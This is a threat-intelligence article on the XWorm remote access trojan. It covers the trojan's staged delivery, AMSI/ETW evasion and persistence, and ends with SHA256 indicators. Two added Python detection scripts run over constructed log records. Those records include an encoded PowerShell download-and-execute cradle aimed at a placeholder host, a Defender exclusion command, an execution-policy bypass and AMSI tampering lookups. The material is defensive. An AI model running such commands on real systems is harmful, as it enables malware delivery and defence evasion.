In the ever-shifting landscape of cybercrime, XWorm, a notorious remote access trojan (RAT), continues to evolve, arming threat actors with fresh tactics to bypass modern security defenses.
The Splunk Threat Research Team (STRT) has recently dissected a wave of new XWorm campaigns, revealing a sophisticated arsenal of stagers, loaders, and obfuscation techniques designed to infiltrate organizations undetected.
Sophisticated Multi-Stage Delivery Chain
Unlike many traditional malware strains that adhere to predictable infection paths, XWorm employs a diverse array of stagers and loaders, cycling through various file formats and scripting languages.
Recent attacks have leveraged a wide range of tools, including PowerShell scripts, VBS files, .NET executables, JavaScript, batch files, ISO images, VHD, IMG, and even malicious Office macros.
STRT’s analysis of 1,000 XWorm samples from Malware Bazaar highlighted the prevalence of phishing lures, with filenames themed around invoices, receipts, and shipping notifications: classic bait for business users.

Once clicked, these files unleash obfuscated code designed to avoid detection and analysis.
A key technical innovation is XWorm’s use of .hta and PowerShell stagers that download additional payloads directly from attacker-controlled command-and-control (C2) servers.
Many script-based stagers are heavily obfuscated, leveraging Base64 and AES encryption to conceal their actions and deliver follow-on malware components.
Defense Evasion and Persistence Mechanisms
Among XWorm’s most alarming features are its advanced defense-evasion methods.
The malware actively disables Windows Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW), patching memory functions to bypass in-memory security scans and suppress system logs.
This allows malicious code to operate covertly, eluding both antivirus solutions and behavioral monitoring tools.
Persistence is achieved through registry run keys, scheduled tasks, and startup folder shortcuts, ensuring XWorm survives system reboots.
The analysis also reveals the RAT’s ability to replicate itself via removable drives and establish footholds for privilege escalation through scheduled tasks.
Once resident, XWorm conducts reconnaissance by querying Windows Management Instrumentation (WMI) to inventory security software, capture hardware details, and identify potential targets, such as webcams.
The RAT additionally modifies Microsoft Defender’s exclusion settings and executes PowerShell with bypassed policy settings, further evading security scrutiny.
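The persistence and tampering behaviours described above (run keys, scheduled tasks, startup-folder shortcuts, Defender exclusions, execution-policy bypass and WMI inventory of security software) all leave traces in endpoint telemetry. The following is an added example, not code from the Splunk report: a small Python triage pass over constructed Sysmon-style records (EventID 1 process creation, 11 file creation, 13 registry value set). The event field names mirror Sysmon's, but the sample paths, task name and SID are invented for the demonstration.

```python
import re

# Constructed Sysmon-style records (not from the report): EventID 1 = process
# create, 11 = file create, 13 = registry value set. Paths and names are invented.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Users\bob\AppData\Roaming\svc.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\bob\AppData\Roaming\svc.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 1 /tn "Updater" /tr C:\Users\bob\AppData\Roaming\svc.exe'},
    {"EventID": 11, "Image": r"C:\Users\bob\AppData\Roaming\svc.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svc.lnk"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -ExecutionPolicy Bypass -NoProfile -Command "Add-MpPreference -ExclusionPath C:\Users\bob\AppData\Roaming"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName"},
    {"EventID": 1, "Image": r"C:\Windows\explorer.exe",          # benign control record
     "CommandLine": r"C:\Windows\explorer.exe"},
]

# Each rule: (name, event IDs it applies to, field to inspect, pattern).
RULES = [
    ("registry_run_key", {13}, "TargetObject",
     re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)),
    ("scheduled_task_create", {1}, "CommandLine",
     re.compile(r"schtasks(\.exe)?.*\s/create\b", re.I)),
    ("startup_folder_shortcut", {11}, "TargetFilename",
     re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)),
    ("defender_exclusion_cmd", {1}, "CommandLine",
     re.compile(r"Add-MpPreference\b.*-Exclusion(Path|Process|Extension)", re.I)),
    ("defender_exclusion_reg", {13}, "TargetObject",      # registry form of the same change
     re.compile(r"\\Windows Defender\\Exclusions\\", re.I)),
    ("execution_policy_bypass", {1}, "CommandLine",
     re.compile(r"-(ExecutionPolicy|ep)\s+Bypass\b", re.I)),
    ("wmi_security_recon", {1}, "CommandLine",           # AV inventory via SecurityCenter2
     re.compile(r"\bAntiVirusProduct\b", re.I)),
]


def triage(events):
    """Return (rule_name, event_index) for every event that trips a rule."""
    hits = []
    for idx, ev in enumerate(events):
        for name, event_ids, field, pattern in RULES:
            if ev.get("EventID") in event_ids and pattern.search(ev.get(field, "")):
                hits.append((name, idx))
    return hits


def rules_fired(events):
    """Distinct rule names that fired, sorted, for a quick summary."""
    return sorted({name for name, _ in triage(events)})


def group_by_image(events):
    """Map each process image to the sorted rules it tripped: one binary that
    both writes a Run key and drops a startup shortcut is far more interesting
    than either event on its own."""
    grouped = {}
    for name, idx in triage(events):
        image = events[idx].get("Image", "")
        grouped.setdefault(image, set()).add(name)
    return {image: sorted(names) for image, names in grouped.items()}


if __name__ == "__main__":
    for image, names in group_by_image(SAMPLE_EVENTS).items():
        print(f"{image}: {', '.join(names)}")
```

The per-image grouping is the useful part: a single rule such as `scheduled_task_create` fires constantly in a real estate, but the same unsigned binary in a user-writable directory tripping two or three of these rules is a strong persistence signal worth escalating.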
Detection and Mitigation
To counter XWorm’s adaptations, Splunk provides a suite of analytic detections ranging from identifying suspicious child processes spawned by scripting engines to monitoring PowerShell operations indicative of cryptographic abuse or in-memory .NET assembly loading.
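To make the detection categories above concrete (scripting engines spawning child processes, Base64-wrapped PowerShell stagers, AMSI/ETW tampering strings, cryptographic abuse and in-memory .NET assembly loading), here is an added Python example that is not part of the Splunk content. It runs two kinds of constructed records through a small rule set: Sysmon EventID 1 process-creation events with `ParentImage`/`Image`/`CommandLine`, and PowerShell script block logs (EventID 4104) with `ScriptBlockText`. The `-EncodedCommand` argument is unwrapped (Base64 of UTF-16LE) before the content rules run, so an encoded download cradle is matched on its decoded text. The sample URL, script fragments and event contents are invented; the indicator strings are generic API and cmdlet names, not values taken from the report.

```python
import base64
import binascii
import re

# Constructed stager text: a download cradle wrapped the way -EncodedCommand expects.
STAGER_TEXT = "IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/x')"
ENCODED_STAGER = base64.b64encode(STAGER_TEXT.encode("utf-16-le")).decode("ascii")

# Constructed events (not from the report). EventID 1 = Sysmon process create,
# EventID 4104 = PowerShell script block logging.
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -enc " + ENCODED_STAGER},
    {"EventID": 4104,
     "ScriptBlockText": "$p = GetProcAddress $h 'AmsiScanBuffer'; $q = GetProcAddress $n 'EtwEventWrite'"},
    {"EventID": 4104,
     "ScriptBlockText": "$aes = New-Object System.Security.Cryptography.AesManaged; "
                        "$aes.Key = [Convert]::FromBase64String($k); "
                        "$d = $aes.CreateDecryptor(); "
                        "[System.Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null, $null)"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",        # benign control
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    {"EventID": 4104, "ScriptBlockText": "Get-ChildItem C:\\ | Sort-Object Length"},  # benign control
]

SCRIPT_ENGINES = {"wscript.exe", "cscript.exe", "mshta.exe"}
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "regsvr32.exe", "rundll32.exe", "mshta.exe"}

# Content indicators applied to script block text and (decoded) command lines.
INDICATORS = {
    "amsi_etw_tamper": re.compile(r"AmsiScanBuffer|amsi\.dll|AmsiUtils|EtwEventWrite", re.I),
    "crypto_abuse": re.compile(r"AesManaged|AesCryptoServiceProvider|CreateDecryptor|FromBase64String", re.I),
    "assembly_load": re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b", re.I),
}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the common ones.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def _basename(path):
    """Last path component, splitting on backslashes so it works off-Windows."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def match_indicators(text):
    return sorted(name for name, pat in INDICATORS.items() if pat.search(text))


def analyze(events):
    """Return (event_index, rule_name) pairs for every rule each event trips."""
    findings = []
    for idx, ev in enumerate(events):
        if ev.get("EventID") == 1:
            parent, child = _basename(ev.get("ParentImage", "")), _basename(ev.get("Image", ""))
            if parent in SCRIPT_ENGINES and child in SUSPICIOUS_CHILDREN:
                findings.append((idx, "script_engine_child"))
            cmd = ev.get("CommandLine", "")
            decoded = decode_encoded_command(cmd)
            findings.extend((idx, n) for n in match_indicators(decoded if decoded is not None else cmd))
        elif ev.get("EventID") == 4104:
            findings.extend((idx, n) for n in match_indicators(ev.get("ScriptBlockText", "")))
    return findings


if __name__ == "__main__":
    for idx, name in analyze(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

Two points carry over to production detections: match on the decoded command line, not only the raw one, or an encoded stager slips past string rules; and treat the parent-child relationship (`mshta.exe` or `wscript.exe` launching PowerShell) as its own signal, because that pairing is rare in normal user activity regardless of what the child's command line contains.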
Given XWorm’s modularity, frequent updates, and deliberate targeting of the supply chain and gaming sectors, organizations are advised to enhance endpoint visibility, fine-tune detections for script-based stagers, and continuously educate employees about phishing threats.
IOC
| SHA256 | Description |
|---|---|
| 78b15b9b54925120b713a52a09c66674463bd689e3b01395801ef58c77651127 | Bat loader |
| 0f10d6cbaf195a7b0c9f708b7f0a225e2de29beb769bdf8d1652b682b1c4679f | PowerShell script |
| 28859e4387fefb9d1f36fdf711d1b058df5effe21d726cfe6a9a285f96db1c98 | Batch script |
| 327a98bd948262a10e37e7d0692c95e30ba41ace15fe01d8e614a9813ad9d5cf | VBScript |
| 354d082858bfc5e24133854ff14bb2e89bc16e1b010b9d3372c8370d3144cdb9 | HTA file |